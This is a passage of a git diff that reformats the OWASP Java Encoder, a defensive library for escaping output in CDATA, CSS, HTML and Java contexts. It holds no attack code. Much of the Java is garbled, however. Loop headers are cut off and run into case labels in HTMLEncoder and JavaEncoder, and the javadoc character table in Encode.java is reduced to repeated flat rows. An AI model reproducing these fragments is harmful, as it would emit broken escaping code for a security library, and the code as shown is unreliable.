b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java index 07f54ff..d08014b 100644 --- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java @@ -37,12 +37,16 @@ import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain - * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not - * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes - * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will - * have to handle multiple CDATA events. As an alternate approach, the caller could pre-encode "]]>" to something of their - * choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML characters. + * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good + * for including large blocks of text that contain characters that normally + * require encoding (ampersand, quotes, less-than, etc...). The CDATA context + * however still does not allow invalid characters, and can be closed by the + * sequence "]]>". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is + * maintained, but the code receiving the output will have to handle multiple + * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to + * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then + * use this encoder to remove any invalid XML characters. * * @author Jeff Ichnowski */ @@ -94,33 +98,31 @@ class CDATAEncoder extends Encoder { // // valid } - } else { - if (i + 1 < n) { - if (input.charAt(i + 1) != ']') { - // "]x" (next character is safe for this to be ']') - } else { - // "]]?" - // keep looping through ']' - for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { - // valid - } - // at this point we've looped through a sequence - // of 2 or more "]", if the next character is ">" - // we need to encode "]]>". - if (i + 2 < n) { - if (input.charAt(i + 2) == '>') { - return i; + } else if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { + return i; // } else { // // valid - } - - } else { - return n; } + + } else { + return n; } - } else { - return n; } + } else { + return n; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { @@ -145,11 +147,12 @@ class CDATAEncoder extends Encoder { // end of input, high without low = invalid return i; } - } else if ( // low surrogate without preceding high surrogate + } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE - || // non characters - ch > '\ufffd' - || ('\ufdd0' <= ch && ch <= '\ufdef')) { + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { return i; // } else { // // valid @@ -180,63 +183,61 @@ class CDATAEncoder extends Encoder { } else { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } - } else { - if (i + 1 < n) { - if (in[i + 1] != ']') { - // "]x" (next character is safe for this to be ']') + } else if (i + 1 < n) { + if (in[i + 1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && in[i + 2] == ']'; ++i) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; - } else { - // "]]?" - // keep looping through ']' - for (; i + 2 < n && in[i + 2] == ']'; ++i) { - if (j >= m) { + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } - out[j++] = ']'; - } - // at this point we've looped through a sequence - // of 2 or more "]", if the next character is ">" - // we need to encode "]]>". - if (i + 2 < n) { - if (in[i + 2] == '>') { - if (j + CDATA_END_ENCODED_LENGTH > m) { - return overflow(input, i, output, j); - } - System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); - j += CDATA_END_ENCODED_LENGTH; - i += 2; - } else { - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ']'; - } - } else if (endOfInput) { - if (j + 2 > m) { + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; - out[j++] = ']'; - i = n; - break; - } else { - break; } + } else if (endOfInput) { + if (j + 2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; } - } else if (endOfInput) { - // seen "]", then end of input. - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ']'; - i++; - break; - } else { - break; } + } else if (endOfInput) { + // seen "]", then end of input. + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { @@ -284,11 +285,12 @@ class CDATAEncoder extends Encoder { } else { break; } - } else if ( // low surrogate without preceding high surrogate + } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE - || // non characters - ch > '\ufffd' - || ('\ufdd0' <= ch && ch <= '\ufdef')) { + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { if (j >= m) { return overflow(input, i, output, j); } @@ -299,9 +301,7 @@ class CDATAEncoder extends Encoder { } out[j++] = ch; } - } - return underflow(input, i, output, j); } diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java index 00ea4c0..2f597b5 100644 --- a/core/src/main/java/org/owasp/encoder/CSSEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java @@ -56,7 +56,7 @@ class CSSEncoder extends Encoder { * Encoding mode of operation--specified the set of characters that * required encoding. */ - static enum Mode { + enum Mode { /** * String contexts. Characters between quotes. * @@ -136,7 +136,7 @@ class CSSEncoder extends Encoder { * * @param mode the mode of the encoder. */ - public CSSEncoder(Mode mode) { + CSSEncoder(Mode mode) { _mode = mode; _lowMask = mode.lowMask(); _highMask = mode.highMask(); @@ -256,10 +256,14 @@ class CSSEncoder extends Encoder { boolean needsSpace = false; if (i+1 < n) { char la = in[i + 1]; - if ('0' <= la && la <= '9' || - 'a' <= la && la <= 'f' || - 'A' <= la && la <= 'F' || - la == ' ' || la == '\n' || la == '\r' || la == '\t' || la == '\f') + if ('0' <= la && la <= '9' + || 'a' <= la && la <= 'f' + || 'A' <= la && la <= 'F' + || la == ' ' + || la == '\n' + || la == '\r' + || la == '\t' + || la == '\f') { needsSpace = true; k++; diff --git a/core/src/main/java/org/owasp/encoder/ChainedEncoder.java b/core/src/main/java/org/owasp/encoder/ChainedEncoder.java index 0c268b4..c28ae40 100644 --- a/core/src/main/java/org/owasp/encoder/ChainedEncoder.java +++ b/core/src/main/java/org/owasp/encoder/ChainedEncoder.java @@ -68,7 +68,7 @@ class ChainedEncoder extends Encoder { * @param first the first encoder to apply * @param last the second/last encoder to apply. */ - public ChainedEncoder(Encoder first, Encoder last) { + ChainedEncoder(Encoder first, Encoder last) { _first = first; _last = last; } diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 1d3d406..511bfa5 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -347,22 +347,54 @@ public final class Encode { * * *                     - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * * *
                    Encoding Description
                    Input CharacterEncoded ResultNotes
                    Input CharacterEncoded ResultNotes
                    U+0008BS\bBackspace character
                    U+0008BS\bBackspace character
                    U+0009HT\tHorizontal tab character
                    U+0009HT\tHorizontal tab character
                    U+000ALF\nLine feed character
                    U+000ALF\nLine feed character
                    U+000CFF\fForm feed character
                    U+000CFF\fForm feed character
                    U+000DCR\rCarriage return character
                    U+000DCR\rCarriage return character
                    U+0022"\x22The encoding \" is not used here because + *
                    U+0022"\x22The encoding \" is not used here because * it is not safe for use in HTML attributes. (In HTML * attributes, it would also be correct to use * "\&quot;".)
                    U+0026&\x26Ampersand character
                    U+0026&\x26Ampersand character
                    U+0027'\x27The encoding \' is not used here because + *
                    U+0027'\x27The encoding \' is not used here because * it is not safe for use in HTML attributes. (In HTML * attributes, it would also be correct to use * "\&#39;".)
                    U+002F/\/This encoding is used to avoid an input sequence + *
                    U+002F/\/This encoding is used to avoid an input sequence * "</" from prematurely terminating a </script> * block.
                    U+005C\\\
                    U+005C\\\
                    U+0000 to U+001F\x##Hexadecimal encoding is used for characters in this + *
                    U+0000 to U+001F\x##Hexadecimal encoding is used for characters in this * range that were not already mentioned in above.
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    * @@ -1294,9 +1326,8 @@ public final class Encode { // else, it's an overflow, we need to use a new output buffer // we'll allocate this buffer to be the exact size of the worst // case, guaranteeing a second overflow would not be possible. - CharBuffer tmp = CharBuffer.allocate( - _output.position() + - encoder.maxEncodedLength(_input.remaining())); + CharBuffer tmp = CharBuffer.allocate(_output.position() + + encoder.maxEncodedLength(_input.remaining())); // copy over everything that has been encoded so far tmp.put(_output.array(), 0, _output.position()); diff --git a/core/src/main/java/org/owasp/encoder/HTMLEncoder.java b/core/src/main/java/org/owasp/encoder/HTMLEncoder.java index e41c294..ad36223 100644 --- a/core/src/main/java/org/owasp/encoder/HTMLEncoder.java +++ b/core/src/main/java/org/owasp/encoder/HTMLEncoder.java @@ -31,40 +31,48 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - *

                    HTMLEncoder -- an encoder for HTML contexts. Currently most - * HTML-based contexts are properly handled by {@line XMLEncoder}. - * The remaining HTML-specific context of "unquoted attributes" could - * not be added to the XMLEncoder without slowing it down. This class - * implements that remaining context: unquoted attribute - * values.

                    + *

                    + * HTMLEncoder -- an encoder for HTML contexts. Currently most HTML-based + * contexts are properly handled by {@link XMLEncoder}. The remaining + * HTML-specific context of "unquoted attributes" could not be added to the + * XMLEncoder without slowing it down. This class implements that remaining + * context: unquoted attribute values.

                    * - *

                    Note: because this context is likely small strings, and - * hopefully rarely used, no effort was put into optimizing this - * encoder.

                    + *

                    + * Note: because this context is likely small strings, and hopefully rarely + * used, no effort was put into optimizing this encoder.

                    * * @author Jeff Ichnowski */ class HTMLEncoder extends Encoder { + /** - * Number of characters in the encoding prefix and suffix when using - * decimal numeric encodings of the form "&#...;". + * Number of characters in the encoding prefix and suffix when using decimal + * numeric encodings of the form "&#...;". */ private static final int ENCODE_AFFIX_CHAR_COUNT = 3; - /** Encoding for '\t'. */ + /** + * Encoding for '\t'. + */ private static final char[] TAB = " ".toCharArray(); - /** Encoding for '&'. */ + /** + * Encoding for '&'. + */ private static final char[] AMP = "&".toCharArray(); - /** Encoding for '<'. */ + /** + * Encoding for '<'. + */ private static final char[] LT = "<".toCharArray(); - /** Encoding for '>'. */ + /** + * Encoding for '>'. + */ private static final char[] GT = ">".toCharArray(); // The large table-switch implementation used here is fast to @@ -72,94 +80,167 @@ class HTMLEncoder extends Encoder { // encoders that use selective if/else's. Look at the results of // BenchmarkTest to see the difference. See note in javadoc as to // reasoning. - // On Core i7 (Sandybridge) // Baseline is 371.401009 ns/op // Benchmarked Encode.forXml: 324.219992 ns/op (-12.70% on baseline) // Benchmarked Encode.forHtmlUnquotedAttribute: 821.583263 ns/op (+121.21% on baseline) - - @Override int maxEncodedLength(int n) { // if everything is line separators and paragraph separators then // we get "⁛" - return n*(ENCODE_AFFIX_CHAR_COUNT+4); + return n * (ENCODE_AFFIX_CHAR_COUNT + 4); } @Override int firstEncodedOffset(String input, int off, int len) { - final int n = off+len; - for (int i=off ; i': - return i; - - case '!': case '#': case '$': case '%': - case '(': case ')': case '*': case '+': - case ',': case '-': case '.': - - case '0': case '1': case '2': case '3': case '4': - case '5': case '6': case '7': case '8': case '9': - case ':': case ';': case '?': case '@': - - case 'A': case 'B': case 'C': case 'D': case 'E': - case 'F': case 'G': case 'H': case 'I': case 'J': - case 'K': case 'L': case 'M': case 'N': case 'O': - case 'P': case 'Q': case 'R': case 'S': case 'T': - case 'U': case 'V': case 'W': case 'X': case 'Y': - case 'Z': - - case '[': case '\\': case ']': case '^': case '_': - - case 'a': case 'b': case 'c': case 'd': case 'e': - case 'f': case 'g': case 'h': case 'i': case 'j': - case 'k': case 'l': case 'm': case 'n': case 'o': - case 'p': case 'q': case 'r': case 's': case 't': - case 'u': case 'v': case 'w': case 'x': case 'y': - case 'z': - - case '{': case '|': case '}': case '~': - break; // valid - - default: - - if (Character.isHighSurrogate(ch)) { - if (i+1 < n) { - if (Character.isLowSurrogate(input.charAt(i+1))) { - int cp = Character.toCodePoint(ch, input.charAt(i+1)); - if (Unicode.isNonCharacter(cp)) { - return i; - } else { - ++i; + case '\t': + case '\r': + case '\f': + case '\n': + case ' ': + case Unicode.NEL: + case '\"': + case '\'': + case '/': + case '=': + case '`': + case '&': + case '<': + case '>': + return i; + + case '!': + case '#': + case '$': + case '%': + case '(': + case ')': + case '*': + case '+': + case ',': + case '-': + case '.': + + case '0': + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + case ':': + case ';': + case '?': + case '@': + + case 'A': + case 'B': + case 'C': + case 'D': + case 'E': + case 'F': + case 'G': + case 'H': + case 'I': + case 'J': + case 'K': + case 'L': + case 'M': + case 'N': + case 'O': + case 'P': + case 'Q': + case 'R': + case 'S': + case 'T': + case 'U': + case 'V': + case 'W': + case 'X': + case 'Y': + case 'Z': + + case '[': + case '\\': + case ']': + case '^': + case '_': + + case 'a': + case 'b': + case 'c': + case 'd': + case 'e': + case 'f': + case 'g': + case 'h': + case 'i': + case 'j': + case 'k': + case 'l': + case 'm': + case 'n': + case 'o': + case 'p': + case 'q': + case 'r': + case 's': + case 't': + case 'u': + case 'v': + case 'w': + case 'x': + case 'y': + case 'z': + + case '{': + case '|': + case '}': + case '~': + break; // valid + + default: + + if (Character.isHighSurrogate(ch)) { + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + } + break; } - break; + } else { + return i; } - } else { + } + + if (ch <= Unicode.MAX_C1_CTRL_CHAR + || Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef') + || ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) + { return i; } - } - - if (ch <= Unicode.MAX_C1_CTRL_CHAR || - Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE || - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef') || - ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) - { - return i; - } } } return n; } /** - * Appends a source array verbatim to the output array. Caller must - * insure there is enough space in the array for the output. + * Appends a source array verbatim to the output array. Caller must insure + * there is enough space in the array for the output. * * @param src the characters to copy * @param out the output buffer @@ -173,8 +254,7 @@ class HTMLEncoder extends Encoder { /** * Appends the numerically encoded version of {@code codePoint} to the - * output buffer. Caller must insure there is enough space for the - * output. + * output buffer. Caller must insure there is enough space for the output. * * @param codePoint the character to encode * @param out the output buffer @@ -185,23 +265,21 @@ class HTMLEncoder extends Encoder { out[j++] = '&'; out[j++] = '#'; if (codePoint >= 1000) { - out[j++] = (char)(codePoint / 1000 % 10 + '0'); + out[j++] = (char) (codePoint / 1000 % 10 + '0'); } if (codePoint >= 100) { - out[j++] = (char)(codePoint / 100 % 10 + '0'); + out[j++] = (char) (codePoint / 100 % 10 + '0'); } if (codePoint >= 10) { - out[j++] = (char)(codePoint / 10 % 10 + '0'); + out[j++] = (char) (codePoint / 10 % 10 + '0'); } - out[j++] = (char)(codePoint % 10 + '0'); + out[j++] = (char) (codePoint % 10 + '0'); out[j++] = ';'; return j; } @Override - CoderResult encodeArrays( - CharBuffer input, CharBuffer output, boolean endOfInput) - { + CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { final char[] in = input.array(); final char[] out = output.array(); int i = input.arrayOffset() + input.position(); @@ -209,8 +287,8 @@ class HTMLEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - charLoop: - for ( ; i m) { - return overflow(input, i, output, j); - } - j = append(TAB, out, j); - break; - - case '\r': case '\n': case '\f': case ' ': case '\"': case '\'': - case '/': case '=': case '`': - if (ENCODE_AFFIX_CHAR_COUNT+2+j > m) { - return overflow(input, i, output, j); - } - j = encode(ch, out, j); - break; - - case Unicode.NEL: - if (ENCODE_AFFIX_CHAR_COUNT+3+j > m) { - return overflow(input, i, output, j); - } - j = encode(ch, out, j); - break; - - case '&': - if (j + AMP.length > m) { - return overflow(input, i, output, j); - } - j = append(AMP, out, j); - break; - - case '<': - if (j + LT.length > m) { - return overflow(input, i, output, j); - } - j = append(LT, out, j); - break; - - case '>': - if (j + GT.length > m) { - return overflow(input, i, output, j); - } - j = append(GT, out, j); - break; - - case '!': case '#': case '$': case '%': - case '(': case ')': case '*': case '+': - case ',': case '-': case '.': - - case '0': case '1': case '2': case '3': case '4': - case '5': case '6': case '7': case '8': case '9': - case ':': case ';': case '?': case '@': - - case 'A': case 'B': case 'C': case 'D': case 'E': - case 'F': case 'G': case 'H': case 'I': case 'J': - case 'K': case 'L': case 'M': case 'N': case 'O': - case 'P': case 'Q': case 'R': case 'S': case 'T': - case 'U': case 'V': case 'W': case 'X': case 'Y': - case 'Z': - - case '[': case '\\': case ']': case '^': case '_': - - case 'a': case 'b': case 'c': case 'd': case 'e': - case 'f': case 'g': case 'h': case 'i': case 'j': - case 'k': case 'l': case 'm': case 'n': case 'o': - case 'p': case 'q': case 'r': case 's': case 't': - case 'u': case 'v': case 'w': case 'x': case 'y': - case 'z': case '{': case '|': case '}': case '~': - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ch; - break; - default: - - if (Character.isHighSurrogate(ch)) { - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { - int cp = Character.toCodePoint(ch, in[i+1]); - if (Unicode.isNonCharacter(cp)) { - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = '-'; - ++i; - } else { - if (j+1 >= m) { - return overflow(input, i, output, j); + case '\t': + if (j + TAB.length > m) { + return overflow(input, i, output, j); + } + j = append(TAB, out, j); + break; + + case '\r': + case '\n': + case '\f': + case ' ': + case '\"': + case '\'': + case '/': + case '=': + case '`': + if (ENCODE_AFFIX_CHAR_COUNT + 2 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + break; + + case Unicode.NEL: + if (ENCODE_AFFIX_CHAR_COUNT + 3 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + break; + + case '&': + if (j + AMP.length > m) { + return overflow(input, i, output, j); + } + j = append(AMP, out, j); + break; + + case '<': + if (j + LT.length > m) { + return overflow(input, i, output, j); + } + j = append(LT, out, j); + break; + + case '>': + if (j + GT.length > m) { + return overflow(input, i, output, j); + } + j = append(GT, out, j); + break; + + case '!': + case '#': + case '$': + case '%': + case '(': + case ')': + case '*': + case '+': + case ',': + case '-': + case '.': + + case '0': + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + case ':': + case ';': + case '?': + case '@': + + case 'A': + case 'B': + case 'C': + case 'D': + case 'E': + case 'F': + case 'G': + case 'H': + case 'I': + case 'J': + case 'K': + case 'L': + case 'M': + case 'N': + case 'O': + case 'P': + case 'Q': + case 'R': + case 'S': + case 'T': + case 'U': + case 'V': + case 'W': + case 'X': + case 'Y': + case 'Z': + + case '[': + case '\\': + case ']': + case '^': + case '_': + + case 'a': + case 'b': + case 'c': + case 'd': + case 'e': + case 'f': + case 'g': + case 'h': + case 'i': + case 'j': + case 'k': + case 'l': + case 'm': + case 'n': + case 'o': + case 'p': + case 'q': + case 'r': + case 's': + case 't': + case 'u': + case 'v': + case 'w': + case 'x': + case 'y': + case 'z': + case '{': + case '|': + case '}': + case '~': + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + break; + default: + + if (Character.isHighSurrogate(ch)) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = '-'; + ++i; + } else { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; } - out[j++] = ch; - out[j++] = in[++i]; + break; } - break; + } else if (!endOfInput) { + break charLoop; } - } else if (!endOfInput) { - break charLoop; } - } - - if (j >= m) { - return overflow(input, i, output, j); - } - - if (ch <= Unicode.MAX_C1_CTRL_CHAR || - Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE || - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { - // invalid - out[j++] = '-'; - } else if (ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) { - if (ENCODE_AFFIX_CHAR_COUNT+4+j > m) { + + if (j >= m) { return overflow(input, i, output, j); } - j = encode(ch, out, j); - } else { - out[j++] = ch; - } + + if (ch <= Unicode.MAX_C1_CTRL_CHAR + || Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + // invalid + out[j++] = '-'; + } else if (ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) { + if (ENCODE_AFFIX_CHAR_COUNT + 4 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + } else { + out[j++] = ch; + } } } diff --git a/core/src/main/java/org/owasp/encoder/JavaEncoder.java b/core/src/main/java/org/owasp/encoder/JavaEncoder.java index 7f4231b..277a721 100644 --- a/core/src/main/java/org/owasp/encoder/JavaEncoder.java +++ b/core/src/main/java/org/owasp/encoder/JavaEncoder.java @@ -31,32 +31,39 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * JavaEncoder -- Encoder for Java based strings. Useful if in Java code - * generators to generate efficiently encoded strings for arbitrary data. - * This encoder uses the minimal sequence of characters required to encode - * a character (e.g. standard backslash escapes, such as "\n", "\\" , "\'", - * octal escapes, and unicode escapes). This encoder does NOT check UTF-16 - * surrogate pair sequences. The target output context supports mismatched - * UTF-16 pairs (e.g. it will compile, run, etc... with them). + * JavaEncoder -- Encoder for Java based strings. Useful if in Java code + * generators to generate efficiently encoded strings for arbitrary data. This + * encoder uses the minimal sequence of characters required to encode a + * character (e.g. standard backslash escapes, such as "\n", "\\" , "\'", octal + * escapes, and unicode escapes). This encoder does NOT check UTF-16 surrogate + * pair sequences. The target output context supports mismatched UTF-16 pairs + * (e.g. it will compile, run, etc... with them). * * @author Jeff Ichnowski */ class JavaEncoder extends Encoder { - /** The length of a Unicode escape, e.g. "\\u1234". */ + /** + * The length of a Unicode escape, e.g. "\\u1234". + */ static final int U_ESCAPE_LENGTH = 6; - /** The length of a octal escape sequence, e.g. "\377". */ + /** + * The length of a octal escape sequence, e.g. "\377". + */ static final int OCT_ESCAPE_LENGTH = 4; - /** Number of bits to shift for each octal unit. */ + /** + * Number of bits to shift for each octal unit. + */ static final int OCT_SHIFT = 3; - /** The bit-mask for an octal unit. */ + /** + * The bit-mask for an octal unit. + */ static final int OCT_MASK = 7; @Override @@ -67,8 +74,8 @@ class JavaEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { - final int n = off+len; - for (int i=off ; i= ' ' && ch <= '~') { if (ch == '\\' || ch == '\'' || ch == '\"') { @@ -82,9 +89,7 @@ class JavaEncoder extends Encoder { } @Override - protected CoderResult encodeArrays( - CharBuffer input, CharBuffer output, boolean endOfInput) - { + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { final char[] in = input.array(); final char[] out = output.array(); int i = input.arrayOffset() + input.position(); @@ -92,12 +97,12 @@ class JavaEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - charLoop: - for ( ; i= ' ' && ch <= '~') { if (ch == '\\' || ch == '\'' || ch == '\"') { - if (j+1 >= m) { + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; @@ -110,97 +115,97 @@ class JavaEncoder extends Encoder { } } else { switch (ch) { - case '\b': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'b'; - break; - case '\t': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 't'; - break; - case '\n': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'n'; - break; - case '\f': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'f'; - break; - case '\r': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'r'; - break; - default: - if (ch <= '\377') { - longEscapeNeeded: - { - if (ch <= '\37') { - // "short" octal escapes: '\0' to '\37' - // cannot be followed by '0' to '7' thus - // require a lookahead to use. - if (i+1 < n) { - char la = in[i + 1]; - if ('0' <= la && la <= '7') { - break longEscapeNeeded; - } - } else if (!endOfInput) { - // need more characters to see if we can use - // a short octal escape. - break charLoop; - } - - if (ch <= '\7') { - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = (char)(ch + '0'); - } else { - if (j+2 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = (char)((ch >>> OCT_SHIFT) + '0'); - out[j++] = (char)((ch & OCT_MASK) + '0'); - } - - continue; - } + case '\b': + if (j + 1 >= m) { + return overflow(input, i, output, j); } - - if (j + OCT_ESCAPE_LENGTH > m) { + out[j++] = '\\'; + out[j++] = 'b'; + break; + case '\t': + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; - out[j++] = (char)((ch >>> 2*OCT_SHIFT) + '0'); - out[j++] = (char)(((ch >>> OCT_SHIFT) & OCT_MASK) + '0'); - out[j++] = (char)((ch & OCT_MASK) + '0'); - } else { - if (j+U_ESCAPE_LENGTH > m) { + out[j++] = 't'; + break; + case '\n': + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; - out[j++] = 'u'; - out[j++] = HEX[ch >>> 3*HEX_SHIFT]; - out[j++] = HEX[(ch >>> 2*HEX_SHIFT) & HEX_MASK]; - out[j++] = HEX[(ch >>> HEX_SHIFT) & HEX_MASK]; - out[j++] = HEX[ch & HEX_MASK]; - } + out[j++] = 'n'; + break; + case '\f': + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'f'; + break; + case '\r': + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'r'; + break; + default: + if (ch <= '\377') { + longEscapeNeeded: + { + if (ch <= '\37') { + // "short" octal escapes: '\0' to '\37' + // cannot be followed by '0' to '7' thus + // require a lookahead to use. + if (i + 1 < n) { + char la = in[i + 1]; + if ('0' <= la && la <= '7') { + break longEscapeNeeded; + } + } else if (!endOfInput) { + // need more characters to see if we can use + // a short octal escape. + break charLoop; + } + + if (ch <= '\7') { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) (ch + '0'); + } else { + if (j + 2 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) 